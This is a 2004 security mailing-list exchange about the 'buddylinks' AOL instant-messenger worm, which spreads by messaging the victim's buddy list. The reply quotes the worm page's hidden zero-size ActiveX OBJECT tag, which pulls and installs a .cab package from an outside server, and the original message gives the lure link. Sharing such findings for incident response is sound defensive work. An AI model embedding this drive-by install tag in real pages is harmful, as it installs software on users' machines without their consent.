Security Incidents mailing list archives
RE: buddylinks worm
From: "Jeremy Junginger" <jj () act com>
Date: Tue, 10 Feb 2004 15:57:55 -0700
Yep! It actually uses the follwing method: <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4" CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001 "> </OBJECT> To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size 81,920), which is an ActiveX control. That's all I've found so far. Let me know if you guys find anything else. -Jeremy -----Original Message----- From: Jason Yates [mailto:jaywhy2 () comcast net] Sent: Tuesday, February 10, 2004 2:58 PM To: incidents () securityfocus com Subject: buddylinks worm Another one of the AOL worms; this one instant messages all users on your buddy list. The message I've recieved is "check this out: http://ww.wgutv.com/osama_capture.php?bNek". The link is a fact news website telling you to download some software . Once you install the software on the page; it immediately instant messages everyone on your buddy list. The software it installs is something called buddylinks. According to buddylinks.net, Buddylinks is a "revolutionary new way for instant messenger users to instantaneously share entertaining content with their entire IM "buddy list" network all at one time". I can't make this stuff up. Jason Yates --------------------------------------------------------------------------- Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection Protect your network with the comprehensive security solution that integrates six applications for ease of use and lower TCO. Firewall - Virus protection - Spam protection - URL blocking - VPN - Wireless security. Download 30-day evaluation at: http://www.astaro.com/php/contact/securityfocus.php ---------------------------------------------------------------------------- This e-mail message and all attachments transmitted with it may be confidential and are intended solely for the addressee(s). If you are not the intended recipient or the person responsible for delivering it to the intended recipient, you are hereby notified that any reading, dissemination, distribution, copying, or other use of this message or its attachment(s) is strictly prohibited. If you receive this email in error, please immediately notify the sender of the message or Best Software, Inc. by e-mailing postmaster () bestsoftware com and destroy all copies of this message. Best Software, for the protection of our internal systems and those of our customers, does block most email attachments. --------------------------------------------------------------------------- Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection Protect your network with the comprehensive security solution that integrates six applications for ease of use and lower TCO. Firewall - Virus protection - Spam protection - URL blocking - VPN - Wireless security. Download 30-day evaluation at: http://www.astaro.com/php/contact/securityfocus.php ----------------------------------------------------------------------------
Current thread:
- buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm Dennis Cheung (Feb 12)
- Re: buddylinks worm falcon (Feb 12)
- Re: buddylinks worm Eric Trager (Feb 12)
- Re: buddylinks worm Mark Coleman (Feb 12)
- Re: buddylinks worm Alexander Kiwerski (Feb 13)
- <Possible follow-ups>
- RE: buddylinks worm Jeremy Junginger (Feb 10)
- Re: buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm Clint Bodungen (Feb 12)
- Re: buddylinks worm Jason Yates (Feb 10)
- Re: buddylinks worm upallnight42 (Feb 12)
- Re: buddylinks worm Scott (Feb 12)
- Re: buddylinks worm Access Denied (Feb 18)
- Re: buddylinks worm Dennis Cheung (Feb 12)